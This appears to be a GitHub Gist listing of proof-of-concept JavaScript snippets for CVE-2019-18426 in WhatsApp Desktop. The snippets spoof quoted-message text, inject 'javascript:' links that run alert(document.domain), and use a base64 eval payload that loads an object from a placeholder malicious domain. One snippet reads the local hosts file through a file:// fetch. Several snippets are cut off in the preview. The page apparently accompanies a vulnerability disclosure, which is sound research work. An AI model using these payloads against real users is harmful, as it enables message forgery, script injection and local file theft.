Skip to content

Instantly share code, notes, and snippets.

galpx / 9.js
Created August 11, 2020 10:07
WhatsApp FS read vuln post CVE-2019-18426
(async function(){
// read "file:///C:/Windows/System32/drivers/etc/hosts" content
const r = await fetch('file:///C:/Windows/System32/drivers/etc/hosts);
const t = await r.text();
galpx / 8.html
Created August 11, 2020 10:07
WhatsApp FS read vuln post CVE-2019-18426
alert('external payload');"
galpx / 8.js
Created August 11, 2020 10:06
WhatsApp FS read vuln post CVE-2019-18426
alert('external payload');"
galpx / 7.js
Created August 11, 2020 10:05
WhatsApp FS read vuln post CVE-2019-18426
var payload = `
hard_expire_time.innerHTML +=
'<object data="https://MY_MALICIOUS_DOMAIN/MY_PAYLOAD_IFRAME.html" />';
payload = `javascript:"";eval(atob("${btoa(payload)}"))`;
e.__x_body = e.__x_matchedText = payload;
galpx / 6.js
Created August 11, 2020 10:04
WhatsApp FS read vuln post CVE-2019-18426
e.__x_body = e.__x_matchedText = 'javascript:"";alert(document.domain)';
galpx / 5.js
Created August 11, 2020 10:03
WhatsApp FS read vuln post CVE-2019-18426
e.__x_body = e.__x_matchedText = "javascript:alert(document.domain)";
galpx / 4.js
Created August 11, 2020 10:03
WhatsApp FS read vuln post CVE-2019-18426
e.__x_body = e.__x_matchedText =
"Join Facebook![email protected]/2SfZikR Become a friend of mine!";
galpx / 3.js
Created August 11, 2020 10:02
WhatsApp FS read vuln post CVE-2019-18426
e.__x_body = e.__x_matchedText = "";
galpx / 2.js
Created August 11, 2020 10:01
WhatsApp FS read vuln post CVE-2019-18426
e.__x_quotedMsg.body = "I think you are the worst!"; // alter the text
e.__x_quotedStanzaID = e.__x_quotedStanzaID + "_"; // change the id of the original message
galpx / 1.js
Created August 11, 2020 10:00
WhatsApp FS read vuln post CVE-2019-18426
e = {
__x_body: "Why would you say that?!",
__x_type: "chat",
__x_quotedMsg: {
body: "I think you are the best!",
type: "chat",
mentionedJidList: [],
isForwarded: false,
labels: [],